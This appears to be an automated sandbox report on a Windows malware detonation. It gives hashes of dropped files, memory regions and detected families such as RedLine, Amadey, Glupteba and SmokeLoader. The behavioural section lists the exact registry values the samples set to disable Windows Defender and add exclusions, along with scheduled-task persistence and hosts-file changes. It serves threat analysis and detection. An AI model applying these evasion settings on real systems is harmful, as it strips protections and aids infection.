SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe

MD5 359ee24f0b20601a30a21e874616d271
SHA1 b12f7e295a2508e171e7246248f2896297492d3e
SHA256 ee87bd300f1cfc4e4096bae6608b47e9e49608477be6b6c33af80da888444889
SHA512 99d8d2c4aefeb564fe541fe4599e67d502915c34bdef7c2560cb91d31bdf2ca9a36972e6eb642386f809f7938d5e63c11fdcdf3ed29a74633aa70cc4804c95d8

memory/1700-292-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1700-293-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1700-294-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1700-295-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1700-296-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1700-297-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1700-299-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1700-303-0x0000000000400000-0x0000000000434000-memory.dmp

memory/1700-306-0x0000000000400000-0x0000000000434000-memory.dmp

memory/2344-309-0x0000000000A40000-0x0000000000A4A000-memory.dmp

memory/2964-322-0x0000000000D10000-0x0000000000D4E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarE48.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 90636b768cbf339bdaa2be6a276e2599
SHA1 59f1725d4d2e8579aab36c3e1860538ab1fb5ac7
SHA256 d7d633028448da1e25d92840f312dd1561ee509bf7aecf02fc42a8af2c24bc13
SHA512 6f39f8dba4b048a1d3869fe21d43b697b2d5f7a80a6d4c4bca42df2af2d91f705c7a15fbebc56067343c80421b3b42925639e5a509cd6f9ab36e022e7e5e7178

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 1b216a3e173ecf36dca8646bd43fdc0e
SHA1 88f84c1d439d8b87fecd972009b9e933ed120847
SHA256 8df45da462b3ed1b47c8f28eea3ba0f1f1574d53c689da0f916f2513a8ac584e
SHA512 c65dbc5bbe2f9ba237073a5a829f2a855092de8f105e98fccca2eeaac6c3a1c2a13a636fd2fd81d4fa3190a99385a6ce00e632db57c56b355fa56f9e8a204647

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 905cc6f3bfeb677b3aa1c4d818ce26eb
SHA1 3469133a7ff64b8691e31b1c7dcab6c064c29569
SHA256 66d1e137bba32ee61654eb23482a9afd70113b3d0d289c19b63981234efc88ab
SHA512 01c74f2ef1a9298d1d55d5403762ab761732c7f1101819c60053aa6ffc0866293fac32f8b9c3df016653825b31ed27f44191c328569328396e9a5ad94a76f621

memory/656-360-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/2344-364-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/656-365-0x0000000007290000-0x00000000072D0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

MD5 ac89a852c2aaa3d389b2d2dd312ad367
SHA1 8f421dd6493c61dbda6b839e2debb7b50a20c930
SHA256 0b720e19270c672f9b6e0ec40b468ac49376807de08a814573fe038779534f45
SHA512 c6a88f33688cc0c287f04005e07d5b5e4a8721d204aa429f93ade2a56aeb86e05d89a8f7a44c1e93359a185a4c5f418240c6cdbc5a21314226681c744cf37f36

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA

MD5 44d1a727c844c82b44abce08f85e4ba2
SHA1 ea929110cfe48fce9938abbb524613acacc3333e
SHA256 c7f96832863945fbe3f385be3baa84e9602191b7dfe36ba225edf69806a3e095
SHA512 eb0e9df32e963acf73c7f0b2c3cab98c38096626926492ca2e9da3372f6ef5d8bb4218873b5e93926b91fe446c48c66413e5d5546eb7af8313de58d6c4f78edd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5a88041b842dc9e5456c07c8d7d510c5
SHA1 1b699cc81b5894b88d2c677a39eb6a2ff8606988
SHA256 4000fc491b5c6186ff4350ff2bf577c8abe35b7e12e02dea36bc5b19a6dbb36b
SHA512 5f0a93434eb9195e1db5dcf105e3e5830c3f5341fa341143b0c2255ce2baf6ceaaa5f4cf6155260b652ffa8e77852c603b656898767e82ad81d794fed23d8898

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_249A1AAD948A044308274CC39E5A79B2

MD5 e05fbdcad82fc43f08e0976e3a404c99
SHA1 6764307de5d3ffaf0bf846b20ade9e324249bdd4
SHA256 4f152a558e8554066f0c2b50cd7646e83f139ae648cb3afc0e1fb6e8a6091a66
SHA512 ee2fdd2ac94fe143e1bfe77adf14468428541cb13259c3521c5eb50a085fda697e3567472a1d52d5c4e13ae7a1de3f3b53ea281b7b25cf3dea624bcdc0e0ffe6

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X62LAKSP\hLRJ1GG_y0J[1].ico

MD5 8cddca427dae9b925e73432f8733e05a
SHA1 1999a6f624a25cfd938eef6492d34fdc4f55dedc
SHA256 89676a3fb8639d6531c525e5800ff4cc44d06d27ff5607922d27e390eb5b6e62
SHA512 20fbee2886995c253e762f2bb814ad16890b0989deab4d92394363ef0060b96a634d87c380c7ba1b787a8ab312be968fed9329a729b4e0d64235a09e397db740

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2WGHIKMU\favicon[1].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

memory/656-663-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/2344-664-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/2344-665-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/656-666-0x0000000007290000-0x00000000072D0000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/1636-682-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/1636-683-0x0000000000140000-0x00000000013C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

C:\Users\Admin\AppData\Local\Temp\B2E2.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 1c01927ac6e677d4f277cb9f7648ca70
SHA1 30d980c95b28c4856baef117e228d75e6a25e113
SHA256 c2efd2f57310cfa062ce5bc7bd1e87ef55c50412cf9e48d9765e0c2db08bf60a
SHA512 71989e394718c53042e4bc1242f2281610eea390eade147f248dae0a6b79954013654e8cd824e2f367d414758833aabe36f1581ad9d52e9ee63e905ce4d7473e

memory/1244-704-0x0000000000840000-0x0000000000940000-memory.dmp

memory/1244-705-0x0000000000220000-0x0000000000229000-memory.dmp

memory/1908-706-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2948-708-0x00000000027B0000-0x0000000002BA8000-memory.dmp

memory/1908-710-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1908-711-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2948-712-0x00000000027B0000-0x0000000002BA8000-memory.dmp

memory/2948-713-0x0000000002BB0000-0x000000000349B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C135.exe

MD5 dd007c4e6d34d7270ec93a99f14e2793
SHA1 a168c1b975d3268646f2443444f805e7f5dd0312
SHA256 df696ba95cdd47b74f8393c8a27cf824cb39c0a0613d65708c12cbf988cf0852
SHA512 cd834e05639c3b6ced81071f1aa1bb62955fe667b1106f54d67acc74d4eefd778ff869040ccb14517d13a0c51ce63b1a4222f008b2ff33b48d12bcde66a3b3f6

memory/2948-719-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1636-720-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/1304-721-0x0000000002AC0000-0x0000000002AD6000-memory.dmp

memory/1908-722-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2496-741-0x0000000000220000-0x000000000027A000-memory.dmp

memory/2496-742-0x0000000000400000-0x000000000047E000-memory.dmp

memory/2496-753-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/2496-754-0x0000000007030000-0x0000000007070000-memory.dmp

memory/1948-775-0x0000000000EF0000-0x000000000106E000-memory.dmp

memory/1948-786-0x0000000073CF0000-0x00000000743DE000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8d54fdac4ff6b142e810ac5c81466691
SHA1 56a5453e26ae1d02375f50daa9fb51c163233fdb
SHA256 bc65812b30ca3a476e85be370a144d13bcad78149de1fc5036d8436f48deba5b
SHA512 c28ed3b01c1f9b130afc7cf8ac92e8a8cc0ea22f8de5690de77a4eaa71dbc8542d745bf92bb0d2e4027fbcb8d610d6ab80f7b61e26e712f99e57516374ce32a9

C:\Users\Admin\AppData\Local\Temp\7zSD7D8.tmp\Install.exe

MD5 6a77181784bc9e5a81ed1479bcee7483
SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

memory/1636-800-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/1608-803-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2948-804-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2948-810-0x0000000002BB0000-0x000000000349B000-memory.dmp

memory/1948-812-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/1608-808-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d41266881d0f188ef84f3a72063862c9
SHA1 6c9a3568c1558731c0cb8c34380c884cc5f2d465
SHA256 f7d4be31fac8a69227f523ef62e7f8b8e33202aa70189a5aa23643a0d8b0f6c7
SHA512 444db0bb98dc663aac1ec587e7100c32cf463042136f6ee1026a60e5ef411628936a716e9e60aab255cabf1c63d2bd7a01ce4a2cfb8111ae167f560cc5fee063

memory/1672-883-0x0000000010000000-0x000000001057B000-memory.dmp

memory/2576-886-0x0000000001040000-0x0000000001048000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d51bd7abf33755de86caba1481e06ec2
SHA1 67bff22cc3f43718e23bb0dcae283cbfc5db807b
SHA256 dad283b40ca185fe56b338caa2bc58db0ed00b68d0554783a6bff471229d849d
SHA512 5b708d82dc381bbf1b8805ed5b70dee4167bb0c7b46ac25dfbbbe69b0ad592785177806bcc17bdb8219a1b9457647f76a155aa40ba048ecee9b5e1efad15702a

memory/1728-1011-0x0000000000400000-0x0000000000627000-memory.dmp

memory/1988-1013-0x0000000000340000-0x0000000000720000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 219c219ee1b2b724e86749f1d6b4630c
SHA1 68a4ad5c2a4f077c5d3eddec5b03f55a57b648c8
SHA256 cb570bd25efb3e7d7923315f10587f22db6f05bd68c23602123c832b3d4471a7
SHA512 46516e95ecbb9656610a7d6dac8578cb80f70395a5b21bd08469c2d4bba7c8e22e83236406b6a773f640b595b1bf69d56962908b9b1d452760e8a1247d96a42d

memory/1728-1039-0x0000000000400000-0x0000000000627000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f4329161f18833dcdb0e9133d0bf1d11
SHA1 b2f37d5976d82a4e388ba5ef052625465d96c6c3
SHA256 a2b27feb0f25d3ebf092427d5ca489c0f9c53839ac3200c73f812530dff34a48
SHA512 b450b728a266e8c51a7161856c0c25147ad4d383f23fd6f052b5214a1580967d911bd3e459c86ea05a749327a67d923643c2f8c9639bf23b8591d3c6e064d0b9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aa2f6ffb32c5fca9a71c78417a34aea6
SHA1 ee7ff2849677f24045fa328e6f1b13d4f809ed74
SHA256 16d9114b049deca62a814ffb56a81fc096c537f71534c6788c7fd02c070046e7
SHA512 10dcf7e27b5e9cadf5296847b073976938eee7be7a44eed8ccafb38a177668f961dd9cf512afdbf9170f5151dbfccfba0b4db2f304d5148fa0d6485200d602c0

memory/2576-1134-0x000007FEF4C80000-0x000007FEF566C000-memory.dmp

memory/2948-1139-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1672-1140-0x0000000000FF0000-0x00000000016DF000-memory.dmp

memory/1672-1141-0x00000000016E0000-0x0000000001DCF000-memory.dmp

memory/1672-1142-0x00000000016E0000-0x0000000001DCF000-memory.dmp

memory/1672-1143-0x00000000016E0000-0x0000000001DCF000-memory.dmp

memory/2776-1144-0x0000000003160000-0x0000000003387000-memory.dmp

memory/2776-1145-0x0000000003160000-0x0000000003387000-memory.dmp

memory/2444-1146-0x0000000000400000-0x0000000000627000-memory.dmp

memory/2444-1147-0x0000000000E70000-0x0000000001097000-memory.dmp

memory/1988-1148-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/2576-1150-0x0000000000360000-0x00000000003E0000-memory.dmp

memory/2444-1149-0x0000000000E70000-0x0000000001097000-memory.dmp

memory/1968-1151-0x0000000001EF0000-0x00000000025DF000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 44bfd08c9b0a82d2d30423527b7b33a6
SHA1 1cb746579ce93693e7e5862949ad657f032ad648
SHA256 9a33a2f6bfbe55ba180334f5b3132ced437c9421521a4bc5f1d9d2c0723beabf
SHA512 6514e2aaefb5e223ceea708ca06c9f5ba144ae1a34551191cfd2d234c362a01be5b86dbd77d3fe776dab6631bf53271cfc32069ab4b1ddd3d0228688024ee543

memory/2496-1226-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/1988-1255-0x0000000000250000-0x000000000025A000-memory.dmp

memory/1988-1258-0x0000000000320000-0x0000000000328000-memory.dmp

memory/1988-1270-0x00000000050B0000-0x0000000005242000-memory.dmp

memory/2948-1272-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1988-1287-0x0000000000780000-0x0000000000790000-memory.dmp

memory/1988-1302-0x0000000073CF0000-0x00000000743DE000-memory.dmp

memory/1988-1304-0x0000000005079000-0x000000000507D000-memory.dmp

memory/1988-1306-0x0000000005760000-0x0000000005799000-memory.dmp

memory/2520-1307-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J7D5Q8LZ345GUWLU5PQD.temp

MD5 b9c60c1c834cd508dfe291f59464650e
SHA1 d23c943144ed2444497f34a4a339ddcad654bf7c
SHA256 bf45fb9082456cc71867ceabdaf08b7112431216aac46997f521e58498ecfec8
SHA512 3780c8aeef13a8d628a304424f2e05eb12d36d4dbfce56348730c3d6ad9c294d282a08ef25b39c7ab75ca99416eba737172cf78c1800e8cc832c7599df673cb1

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe

MD5 cd3191644eeaab1d1cf9b4bea245f78c
SHA1 75f04b22e62b1366a4c5b2887242b63de1d83c9c
SHA256 f626f7361d341ca2b7c67c2b20ca5ab516a6ce4104048c5a3ee3f2d83cc3039f
SHA512 79ebd59d2f66bf3f4417760ff1c9021b3d0e3dcb65da390bf377c3316ce675add82b79bd90750e9b98f68bd5a5625c2b863fadbd0bf447c372b14a619e43d57a

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 47a22b6381043614e8c1ade70a927826
SHA1 8c40d23b4f66a9bb13cda2a094570d6a6cf621fc
SHA256 a888acbdd47fe19ffbd51fefb03423d1792add2c0ec39a0233afee1bbe20df43
SHA512 ecfae941a5d19975cdfd5c7c0d770c50c742fccd73bc099e4929d68255b9e3b90a5a9cf61b6e486e3e5ab9759f30dae765d8bb0f6103e2d5a0af16169c418e55

Analysis: behavioral2

Detonation Overview

Submitted 2023-10-25 04:50
Reported 2023-10-25 04:57
Platform win10-20231020-en
Max time kernel 300s
Max time network 308s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detected google phishing page

phishing google

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\442C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\442C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\442C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\442C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\442C.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\RcYGWmr.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation C:\Windows\System32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe N/A
